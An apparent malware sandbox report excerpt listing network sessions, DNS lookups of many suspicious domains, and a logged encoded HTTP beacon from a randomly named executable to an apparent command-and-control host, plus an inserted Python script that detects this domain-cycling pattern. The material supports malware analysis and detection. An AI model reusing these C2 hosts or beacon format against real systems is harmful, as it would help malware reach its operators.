Jul 2, 2024 14:05:40.226991892 CEST | 49767 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:40.231818914 CEST | 80 | 49767 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:40.233171940 CEST | 49767 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:40.237003088 CEST | 49767 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:40.241842985 CEST | 80 | 49767 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:40.242104053 CEST | 80 | 49767 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:41.067050934 CEST | 80 | 49767 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:41.067084074 CEST | 80 | 49767 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:41.067135096 CEST | 49767 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:41.738990068 CEST | 49767 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:42.756869078 CEST | 49768 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:42.761874914 CEST | 80 | 49768 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:42.761940002 CEST | 49768 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:42.763941050 CEST | 49768 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:42.768759966 CEST | 80 | 49768 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:43.468678951 CEST | 80 | 49768 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:43.469790936 CEST | 80 | 49768 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:43.469844103 CEST | 49768 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:43.472048044 CEST | 49768 | 80 | 192.168.2.6 | 191.6.208.133
Jul 2, 2024 14:05:43.476994991 CEST | 80 | 49768 | 191.6.208.133 | 192.168.2.6
Jul 2, 2024 14:05:48.576740026 CEST | 49769 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:48.581860065 CEST | 80 | 49769 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:48.581964016 CEST | 49769 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:48.583668947 CEST | 49769 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:48.588742971 CEST | 80 | 49769 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:50.099035978 CEST | 49769 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:50.106812000 CEST | 80 | 49769 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:50.111025095 CEST | 49769 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:51.114849091 CEST | 49770 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:51.119909048 CEST | 80 | 49770 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:51.119982004 CEST | 49770 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:51.121795893 CEST | 49770 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:51.126688957 CEST | 80 | 49770 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:52.627871037 CEST | 49770 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:52.633128881 CEST | 80 | 49770 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:52.633199930 CEST | 49770 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:53.658982992 CEST | 49771 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:54.585246086 CEST | 80 | 49771 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:54.585319996 CEST | 49771 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:54.587625980 CEST | 49771 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:54.592536926 CEST | 80 | 49771 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:54.592655897 CEST | 80 | 49771 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:56.096487999 CEST | 49771 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:56.103385925 CEST | 80 | 49771 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:56.107059002 CEST | 49771 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:57.115480900 CEST | 49772 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:57.278592110 CEST | 80 | 49772 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:57.278680086 CEST | 49772 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:57.280318975 CEST | 49772 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:57.285109997 CEST | 80 | 49772 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:59.260705948 CEST | 80 | 49772 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:59.261105061 CEST | 80 | 49772 | 188.114.97.3 | 192.168.2.6
Jul 2, 2024 14:05:59.261149883 CEST | 49772 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:59.263947964 CEST | 49772 | 80 | 192.168.2.6 | 188.114.97.3
Jul 2, 2024 14:05:59.270178080 CEST | 80 | 49772 | 188.114.97.3 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 2, 2024 14:02:53.810754061 CEST | 60636 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:02:54.714447021 CEST | 53 | 60636 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:03:10.740829945 CEST | 65339 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:03:10.751724005 CEST | 53 | 65339 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:03:18.818510056 CEST | 54318 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:03:18.849287033 CEST | 53 | 54318 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:03:31.959697008 CEST | 64188 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:03:32.143774033 CEST | 53 | 64188 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:03:45.381931067 CEST | 63589 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:03:46.193293095 CEST | 53 | 63589 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:03:59.633491039 CEST | 55451 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:03:59.650907040 CEST | 53 | 55451 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:04:12.757234097 CEST | 55274 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:04:12.779609919 CEST | 53 | 55274 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:04:25.912734032 CEST | 62544 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:04:25.938954115 CEST | 53 | 62544 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:04:39.070029974 CEST | 61933 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:04:40.083067894 CEST | 61933 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:04:40.419280052 CEST | 53 | 61933 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:04:40.419321060 CEST | 53 | 61933 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:04:53.695060015 CEST | 55459 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:04:53.712872028 CEST | 53 | 55459 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:05:06.838294029 CEST | 53759 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:05:07.135642052 CEST | 53 | 53759 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:05:20.600732088 CEST | 64839 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:05:20.681009054 CEST | 53 | 64839 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:05:34.333985090 CEST | 64353 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:05:35.156428099 CEST | 53 | 64353 | 1.1.1.1 | 192.168.2.6
Jul 2, 2024 14:05:48.492985010 CEST | 64958 | 53 | 192.168.2.6 | 1.1.1.1
Jul 2, 2024 14:05:48.574402094 CEST | 53 | 64958 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 2, 2024 14:02:53.810754061 CEST | 192.168.2.6 | 1.1.1.1 | 0x62f7 | Standard query (0) | www.jl884.vip | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:10.740829945 CEST | 192.168.2.6 | 1.1.1.1 | 0xcaac | Standard query (0) | www.cloudsoda.xyz | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:18.818510056 CEST | 192.168.2.6 | 1.1.1.1 | 0x1340 | Standard query (0) | www.d99qtpkvavjj.xyz | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:31.959697008 CEST | 192.168.2.6 | 1.1.1.1 | 0xb145 | Standard query (0) | www.firmshow.top | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:45.381931067 CEST | 192.168.2.6 | 1.1.1.1 | 0xe5fb | Standard query (0) | www.jl800.vip | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:59.633491039 CEST | 192.168.2.6 | 1.1.1.1 | 0x1aae | Standard query (0) | www.theridleysuk.co.uk | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:12.757234097 CEST | 192.168.2.6 | 1.1.1.1 | 0x3937 | Standard query (0) | www.dexiangovernment.org | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:25.912734032 CEST | 192.168.2.6 | 1.1.1.1 | 0x3783 | Standard query (0) | www.autonomyai.xyz | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:39.070029974 CEST | 192.168.2.6 | 1.1.1.1 | 0xbfaa | Standard query (0) | www.faxinguxn6.cn | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:40.083067894 CEST | 192.168.2.6 | 1.1.1.1 | 0xbfaa | Standard query (0) | www.faxinguxn6.cn | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:53.695060015 CEST | 192.168.2.6 | 1.1.1.1 | 0xd617 | Standard query (0) | www.hereboy.co.uk | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:05:06.838294029 CEST | 192.168.2.6 | 1.1.1.1 | 0x56c3 | Standard query (0) | www.rebornqababy.ru | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:05:20.600732088 CEST | 192.168.2.6 | 1.1.1.1 | 0x475 | Standard query (0) | www.bulletinnest.com | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:05:34.333985090 CEST | 192.168.2.6 | 1.1.1.1 | 0x3f10 | Standard query (0) | www.erosonline.com.br | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:05:48.492985010 CEST | 192.168.2.6 | 1.1.1.1 | 0xec4 | Standard query (0) | www.cavetta.org.mt | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 2, 2024 14:02:54.714447021 CEST | 1.1.1.1 | 192.168.2.6 | 0x62f7 | No error (0) | www.jl884.vip | e6375a47.jl884.vip.cname.scname.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 2, 2024 14:02:54.714447021 CEST | 1.1.1.1 | 192.168.2.6 | 0x62f7 | No error (0) | e6375a47.jl884.vip.cname.scname.com | | 65.181.132.158 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:02:54.714447021 CEST | 1.1.1.1 | 192.168.2.6 | 0x62f7 | No error (0) | e6375a47.jl884.vip.cname.scname.com | | 38.47.158.160 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:10.751724005 CEST | 1.1.1.1 | 192.168.2.6 | 0xcaac | Name error (3) | www.cloudsoda.xyz | none | none | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:18.849287033 CEST | 1.1.1.1 | 192.168.2.6 | 0x1340 | No error (0) | www.d99qtpkvavjj.xyz | d99qtpkvavjj.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jul 2, 2024 14:03:18.849287033 CEST | 1.1.1.1 | 192.168.2.6 | 0x1340 | No error (0) | d99qtpkvavjj.xyz | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:18.849287033 CEST | 1.1.1.1 | 192.168.2.6 | 0x1340 | No error (0) | d99qtpkvavjj.xyz | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:32.143774033 CEST | 1.1.1.1 | 192.168.2.6 | 0xb145 | No error (0) | www.firmshow.top | | 203.161.43.228 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:46.193293095 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5fb | No error (0) | www.jl800.vip | 8418a72e.jl800.vip.cname.scname.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 2, 2024 14:03:46.193293095 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5fb | No error (0) | 8418a72e.jl800.vip.cname.scname.com | | 38.47.158.215 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:46.193293095 CEST | 1.1.1.1 | 192.168.2.6 | 0xe5fb | No error (0) | 8418a72e.jl800.vip.cname.scname.com | | 65.181.132.188 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:59.650907040 CEST | 1.1.1.1 | 192.168.2.6 | 0x1aae | No error (0) | www.theridleysuk.co.uk | theridleysuk.co.uk | | CNAME (Canonical name) | IN (0x0001) | false
Jul 2, 2024 14:03:59.650907040 CEST | 1.1.1.1 | 192.168.2.6 | 0x1aae | No error (0) | theridleysuk.co.uk | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:03:59.650907040 CEST | 1.1.1.1 | 192.168.2.6 | 0x1aae | No error (0) | theridleysuk.co.uk | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:12.779609919 CEST | 1.1.1.1 | 192.168.2.6 | 0x3937 | No error (0) | www.dexiangovernment.org | dexiangovernment.org | | CNAME (Canonical name) | IN (0x0001) | false
Jul 2, 2024 14:04:12.779609919 CEST | 1.1.1.1 | 192.168.2.6 | 0x3937 | No error (0) | dexiangovernment.org | | 3.33.130.190 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:12.779609919 CEST | 1.1.1.1 | 192.168.2.6 | 0x3937 | No error (0) | dexiangovernment.org | | 15.197.148.33 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:25.938954115 CEST | 1.1.1.1 | 192.168.2.6 | 0x3783 | No error (0) | www.autonomyai.xyz | autonomyai.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Jul 2, 2024 14:04:25.938954115 CEST | 1.1.1.1 | 192.168.2.6 | 0x3783 | No error (0) | autonomyai.xyz | | 15.197.142.173 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:25.938954115 CEST | 1.1.1.1 | 192.168.2.6 | 0x3783 | No error (0) | autonomyai.xyz | | 3.33.152.147 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:40.419280052 CEST | 1.1.1.1 | 192.168.2.6 | 0xbfaa | No error (0) | www.faxinguxn6.cn | | 108.186.253.49 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:40.419321060 CEST | 1.1.1.1 | 192.168.2.6 | 0xbfaa | No error (0) | www.faxinguxn6.cn | | 108.186.253.49 | A (IP address) | IN (0x0001) | false
Jul 2, 2024 14:04:53.712872028 CEST | 1.1.1.1 | 192.168.2.6 | 0xd617 | No error (0) | www.hereboy.co.uk | hereboy.co.uk | | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)hereboy.co.uk3.33.130.190A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)hereboy.co.uk15.197.148.33A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:07.135642052 CEST1.1.1.1192.168.2.60x56c3No error (0)www.rebornqababy.ru87.236.19.243A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:20.681009054 CEST1.1.1.1192.168.2.60x475No error (0)www.bulletinnest.combulletinnest.comCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:05:20.681009054 CEST1.1.1.1192.168.2.60x475No error (0)bulletinnest.com135.181.212.206A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:35.156428099 CEST1.1.1.1192.168.2.60x3f10No error (0)www.erosonline.com.brweb1163.kinghost.netCNAME (Canonical name)IN (0x0001)false
                                                          Jul 2, 2024 14:05:35.156428099 CEST1.1.1.1192.168.2.60x3f10No error (0)web1163.kinghost.net191.6.208.133A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:48.574402094 CEST1.1.1.1192.168.2.60xec4No error (0)www.cavetta.org.mt188.114.97.3A (IP address)IN (0x0001)false
                                                          Jul 2, 2024 14:05:48.574402094 CEST1.1.1.1192.168.2.60xec4No error (0)www.cavetta.org.mt188.114.96.3A (IP address)IN (0x0001)false
                                                          • www.jl884.vip
                                                          • www.d99qtpkvavjj.xyz
                                                          • www.firmshow.top
                                                          • www.jl800.vip
                                                          • www.theridleysuk.co.uk
                                                          • www.dexiangovernment.org
                                                          • www.autonomyai.xyz
                                                          • www.faxinguxn6.cn
                                                          • www.hereboy.co.uk
                                                          • www.rebornqababy.ru
                                                          • www.bulletinnest.com
                                                          • www.erosonline.com.br
                                                          • www.cavetta.org.mt
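Read together, the DNS answers above show one client resolving a different domain roughly every 13 seconds, with four of the names resolving to the same two addresses. The script below is an added example and is not part of the Joe Sandbox report: it parses the answer rows in the run-together form in which the report table copies to plain text, recovers the query/target split of each CNAME row from the sibling A answer that shares its transaction ID (the only unambiguous way to split two fused names), and then measures the lookup cadence and the address overlap. The resolver and client addresses (1.1.1.1 and 192.168.2.6) are taken from the report; the alert thresholds in assess() are hypothetical.

```python
"""Parse flattened Joe Sandbox 'DNS answers' rows (fields run together when the HTML table
is copied to text) and look for decoy-domain cycling: many unrelated names, steady cadence."""
import re
import statistics
from collections import defaultdict
from datetime import datetime
# Assumed from the report: resolver and sandbox client. Knowing both is what makes the fused
# "1.1.1.1192.168.2.6" pair splittable without guessing octet boundaries.
RESOLVER = "1.1.1.1"
CLIENT = "192.168.2.6"
# Sample input: the report's 30 answer rows, copied in their fused form.
ROWS = """\
Jul 2, 2024 14:02:54.714447021 CEST1.1.1.1192.168.2.60x62f7No error (0)e6375a47.jl884.vip.cname.scname.com38.47.158.160A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:10.751724005 CEST1.1.1.1192.168.2.60xcaacName error (3)www.cloudsoda.xyznonenoneA (IP address)IN (0x0001)false
Jul 2, 2024 14:03:18.849287033 CEST1.1.1.1192.168.2.60x1340No error (0)www.d99qtpkvavjj.xyzd99qtpkvavjj.xyzCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:03:18.849287033 CEST1.1.1.1192.168.2.60x1340No error (0)d99qtpkvavjj.xyz3.33.130.190A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:18.849287033 CEST1.1.1.1192.168.2.60x1340No error (0)d99qtpkvavjj.xyz15.197.148.33A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:32.143774033 CEST1.1.1.1192.168.2.60xb145No error (0)www.firmshow.top203.161.43.228A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:46.193293095 CEST1.1.1.1192.168.2.60xe5fbNo error (0)www.jl800.vip8418a72e.jl800.vip.cname.scname.comCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:03:46.193293095 CEST1.1.1.1192.168.2.60xe5fbNo error (0)8418a72e.jl800.vip.cname.scname.com38.47.158.215A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:46.193293095 CEST1.1.1.1192.168.2.60xe5fbNo error (0)8418a72e.jl800.vip.cname.scname.com65.181.132.188A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:59.650907040 CEST1.1.1.1192.168.2.60x1aaeNo error (0)www.theridleysuk.co.uktheridleysuk.co.ukCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:03:59.650907040 CEST1.1.1.1192.168.2.60x1aaeNo error (0)theridleysuk.co.uk3.33.130.190A (IP address)IN (0x0001)false
Jul 2, 2024 14:03:59.650907040 CEST1.1.1.1192.168.2.60x1aaeNo error (0)theridleysuk.co.uk15.197.148.33A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:12.779609919 CEST1.1.1.1192.168.2.60x3937No error (0)www.dexiangovernment.orgdexiangovernment.orgCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:04:12.779609919 CEST1.1.1.1192.168.2.60x3937No error (0)dexiangovernment.org3.33.130.190A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:12.779609919 CEST1.1.1.1192.168.2.60x3937No error (0)dexiangovernment.org15.197.148.33A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:25.938954115 CEST1.1.1.1192.168.2.60x3783No error (0)www.autonomyai.xyzautonomyai.xyzCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:04:25.938954115 CEST1.1.1.1192.168.2.60x3783No error (0)autonomyai.xyz15.197.142.173A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:25.938954115 CEST1.1.1.1192.168.2.60x3783No error (0)autonomyai.xyz3.33.152.147A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:40.419280052 CEST1.1.1.1192.168.2.60xbfaaNo error (0)www.faxinguxn6.cn108.186.253.49A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:40.419321060 CEST1.1.1.1192.168.2.60xbfaaNo error (0)www.faxinguxn6.cn108.186.253.49A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)www.hereboy.co.ukhereboy.co.ukCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)hereboy.co.uk3.33.130.190A (IP address)IN (0x0001)false
Jul 2, 2024 14:04:53.712872028 CEST1.1.1.1192.168.2.60xd617No error (0)hereboy.co.uk15.197.148.33A (IP address)IN (0x0001)false
Jul 2, 2024 14:05:07.135642052 CEST1.1.1.1192.168.2.60x56c3No error (0)www.rebornqababy.ru87.236.19.243A (IP address)IN (0x0001)false
Jul 2, 2024 14:05:20.681009054 CEST1.1.1.1192.168.2.60x475No error (0)www.bulletinnest.combulletinnest.comCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:05:20.681009054 CEST1.1.1.1192.168.2.60x475No error (0)bulletinnest.com135.181.212.206A (IP address)IN (0x0001)false
Jul 2, 2024 14:05:35.156428099 CEST1.1.1.1192.168.2.60x3f10No error (0)www.erosonline.com.brweb1163.kinghost.netCNAME (Canonical name)IN (0x0001)false
Jul 2, 2024 14:05:35.156428099 CEST1.1.1.1192.168.2.60x3f10No error (0)web1163.kinghost.net191.6.208.133A (IP address)IN (0x0001)false
Jul 2, 2024 14:05:48.574402094 CEST1.1.1.1192.168.2.60xec4No error (0)www.cavetta.org.mt188.114.97.3A (IP address)IN (0x0001)false
Jul 2, 2024 14:05:48.574402094 CEST1.1.1.1192.168.2.60xec4No error (0)www.cavetta.org.mt188.114.96.3A (IP address)IN (0x0001)false
"""
ROW_RE = re.compile(
    r"^(?P<ts>\w{3} \d+, \d{4} \d\d:\d\d:\d\d\.\d+) CEST" + re.escape(RESOLVER) + re.escape(CLIENT)
    + r"(?P<txid>0x[0-9a-f]+)(?P<rcode>No error \(0\)|Name error \(3\))(?P<body>.*?)"
    r"(?P<rtype>A|CNAME) \((?:IP address|Canonical name)\)IN \(0x0001\)(?P<aa>true|false)$")
# <name><ipv4> fused; safe here because no name ends in a digit run that reads as an octet.
A_BODY_RE = re.compile(r"^(?P<name>.+?)(?P<addr>\d{1,3}(?:\.\d{1,3}){3})$")

def parse_rows(text):
    recs = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            r = m.groupdict()
            r["ts"] = datetime.strptime(r["ts"][:-3], "%b %d, %Y %H:%M:%S.%f")  # %f: 6 digits max
            recs.append(r)
    a_name = {}  # txid -> name in its A answer, i.e. the CNAME target
    for r in recs:  # pass 1: NXDOMAIN and A rows split unambiguously
        if r["rcode"].startswith("Name error"):
            r["name"], r["cname"], r["addr"] = r["body"].removesuffix("nonenone"), None, None
        elif r["rtype"] == "A":
            m = A_BODY_RE.match(r["body"])
            r["name"], r["cname"], r["addr"] = m["name"], None, m["addr"]
            a_name.setdefault(r["txid"], r["name"])
    for r in recs:  # pass 2: a CNAME row is <query><target>; target = sibling A name
        if r["rtype"] == "CNAME":
            target = a_name.get(r["txid"])
            if target and r["body"].endswith(target):
                r["name"], r["cname"], r["addr"] = r["body"][:-len(target)], target, None
            else:  # no sibling A row in the excerpt: keep the fused string, do not guess
                r["name"], r["cname"], r["addr"] = r["body"], None, None
    return recs

def query_timeline(recs):  # (timestamp, queried name) per transaction id, time-ordered
    first = {}
    for r in recs:  # ids can repeat in a long capture; fine for one short run
        first.setdefault(r["txid"], (r["ts"], r["name"]))
    return sorted(first.values())

def cadence(timeline, tolerance=0.2):  # median gap and how many gaps sit within +/-tolerance
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(timeline, timeline[1:])]
    med = statistics.median(gaps) if gaps else 0.0
    return med, sum(abs(g - med) <= tolerance * med for g in gaps), len(gaps)

def shared_ips(recs):  # addresses that more than one queried name resolved to
    by_ip = defaultdict(set)
    for r in recs:
        if r["addr"]:
            by_ip[r["addr"]].add(r["name"])
    return {ip: sorted(n) for ip, n in by_ip.items() if len(n) > 1}

def assess(recs, min_domains=8, min_steady_ratio=0.75):  # hypothetical thresholds
    tl = query_timeline(recs)
    med, steady, n = cadence(tl)
    names = {name for _, name in tl}
    return {"names": len(names), "median_gap_s": round(med, 3), "steady_gaps": steady, "gaps": n,
            "flagged": len(names) >= min_domains and n > 0 and steady / n >= min_steady_ratio}
if __name__ == "__main__":
    print(assess(parse_rows(ROWS)), shared_ips(parse_rows(ROWS)))
```

On these rows the median gap is about 13.4 s with 12 of 13 gaps inside the tolerance band (the NXDOMAIN for www.cloudsoda.xyz is the outlier), and 3.33.130.190 and 15.197.148.33 are each shared by four of the queried names. The parser deliberately refuses to split a CNAME row whose A answer is missing from the excerpt rather than guess a label boundary.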
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49719 | 65.181.132.158 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
Timestamp | Bytes transferred | Direction | Data
Jul 2, 2024 14:02:54.728878021 CEST | 479 | OUT | GET /r4wk/?mB=rL4lP&GBbljTO=x9GkKIHXkLsCiyVr8u8o1dWkHkpveCE8pq06snQr36Jjj9CRM0vMnoakwWLgrIMHyYBq6SPCqUTgPlgJ6rJOIdv2Hpbl0D0DeBG+01R28dU1nzrJm0yQzAnZDQ+iQUJ8Z49zmcM= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.jl884.vip
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Jul 2, 2024 14:02:55.701474905 CEST | 778 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:02:55 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=f069c706-b7c4-4a32c8a212c298de53e6180968e429573b0b; Expires=1719928975; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199217754847895e0098e04bbfd507822c5cf4a54418d67f04fe;path=/;HttpOnly;Max-Age=1800
                                                          jckl: v1QTA/ISyC2vPuJ130ArugFeZMlQ4JvMX/+JLNkJ46w+2KdcRncfulR1Bv3Iy3/WIW1ETD+BPM5uhk0k3hN7Hg==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: f348ea4096987dd5a229f7ccb11ab2ca
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
